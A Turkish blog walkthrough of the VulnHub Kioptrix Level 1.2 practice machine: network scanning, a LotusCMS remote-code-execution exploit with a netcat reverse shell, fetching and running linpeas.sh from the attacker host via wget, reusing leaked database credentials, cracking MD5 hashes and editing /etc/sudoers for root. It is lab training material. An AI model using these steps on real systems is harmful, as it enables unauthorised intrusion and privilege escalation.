Merhaba arkadaşlar, bu yazımda vulnhub platformundaki “Kioptrix Level 1.2 (#3)“ makinesini nasıl çözdüğümü anlatacağım.

Kioptrix Level 1.2 (#3) makinesine buradaki bağlantıdan ulaşabilirsiniz.

Bu makinede önemli olan, IP’yi bulduğunuzda ana bilgisayarınızın /etc/hosts dosyasını düzenleyip kioptrix3.com adresine yönlendirmek. İşin içinde bir web uygulaması var, bu yüzden her şeyin güzel ve düzgün bir şekilde görüntülenmesi için bunu yapmanız gerekiyor.


Makine kurulup çalışmaya başladıktan sonra IP adresini bulmamız gerekiyor. IP adresini ağ taraması yaparak elde edebiliriz.

Makineler 192.168.1.255 subnetine bağlı. netdiscover kullanarak ağdaki tüm makineleri bulabiliriz.

#Subnetteki cihazları bulmak için:

sudo netdiscover -P -r 192.168.1.0/24

Ağ üzerinde tanıdık olmayan tek cihaz 192.168.1.124 Kioptrixin ip adresi olmalı. Makinenin açıklamasında belirtildiği gibi. Kioptrix’in IP adresini bir domain ile eşleştirmeliyiz.

cat /etc/hosts

# Host dosyamıza aşağıdaki satırı ekliyoruz..
192.168.1.124 kioptrix3.com

Nmap aracını kullanarak sistemdeki açık portları ve servisleri tarıyorum.

nmap -A -sT 192.168.1.124 -T4

22 ve 80 portlarının açık olduğunu görüyorum.

Nikto ile web uygulamasını tarıyorum.

Nikto taramamız, web uygulamasının bir /phpmyadmin dizinine sahip olduğunu gösteriyor, buradan uygulamanın bir MySQL veritabanı kullandığını anlıyoruz.

Ardından gobuster aracını kullanarak dizin taraması yapıyorum.

Dizin taramasında /phpmyadmin dizini de bulundu. Ayrıca /modules, /gallery, /data, /core ve /style dizinleri de bulundu.

/modules dizini bazı .php dosyaları içeriyor ancak biraz araştırdığımda önemli birşey bulamıyorum. /gallery e gittiğimizde ise bir resim galerisiyle karşılaşıyoruz.

Giriş sayfasında ise, Ligoat Security sitesinin LotusCMS kullandığını görüyoruz. İnternette LotusCMS ile ilgili araştırma yaptığımda, bu CMS sisteminin bilinen bir uzaktan komut yürütme (RCE) güvenlik açığına sahip olduğunu buldum.

exploite buradan ulaşabilirsiniz.

Exploiti çalıştırıp netcat ile dinlemeye alıyorum ve makineye erişim sağlıyorum.

Shelli aldığımıza göre yetki yükseltip root olma zamanı. Kendi makinemde python ile http server başlatıp wget ile linpeas.sh dosyasını hedef makineye indiriyorum.

Kendi makinemde çalıştırdığım kod: sudo python3 -m http.server 80

Hedefte çalıştırdığım kod: wget http://192.168.1.153:80/linpeas.sh

chmod +x linpeas.sh

./linpeas.sh

Tarama sonucunda dosyanın birinde bir şifre yazdığını buluyorum.

Find kullanarak herhangi bir config dosyasının mevcut olup olmadığını kontrol ediyorum ve 2 adet dosya buluyorum.

find . -type f -iname *config*

/gallery/gconfig.php dosyasını incelediğimde aşağıdaki bilgilerle karşılaşıyorum.

Gallery adlı databasein içinde Username “root”, password “fuckeyou” bilgileri olduğunu görüyoruz. Nikto ile yaptığımız taramadan /phpmyadmin dizininde bir giriş paneli olduğunu biliyoruz.

Bulduğumuz bilgilerle panele giriş yapıyoruz ve önceki bilgileri bulduğumuz databasei biraz kurcalayınca aşağıdaki bilgilere ulaşıyoruz.

dev_accounts tablosu, dreg ve loneferret kullanıcılarının hashli parolalarını içeriyor. gallarific_users tablosu ise admin şifresini içeriyor.

Hash identifier kullanarak dreg ve loneferret kullanıcılarının parolalarının md5 ile hashlendiğini buluyorum.

Ardından crackstation kullanarak bu md5 li parolaları kırıyorum.

sudo -l komutunu çalıştırdığımda ht adli bir editoru çalıştırabileceğimi görüyorum. Deniyorum ama aşağıdaki hatayı alıyorum.

Buradan çalıştıramadığım için açık olan ssh portundan bağlanmayı deniyorum ve aşağıdaki hatayı alıyorum.

Hatayı internetten araştırdım ve bu forumdan çözümü buldum.

ssh -oHostKeyAlgorithms=+ssh-dss loneferret@192.168.1.124

Şeklinde başarıyla bağlanabildim fakat sudo ht komutunu çalıştırdığımda yine aşağıdaki hatayı aldım.

Bunun da çözümünü burada buldum.

export TERM=xterm

Bu komuttan sonra başarıyla ht editorü çalıştırdım. Şimdi amacımız root olmak olduğu için ht editörü kullanarak f3 e basıp, /etc/sudoers dosyasını açmaya çalışıyorum ve işe yarıyor.

loneferret ALL=(ALL) NO PASSWD:ALL

Şeklinde değiştiriyorum. sudo -i diyorum ve root oluyoruz.

Okuduğunuz için teşekkürler.

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.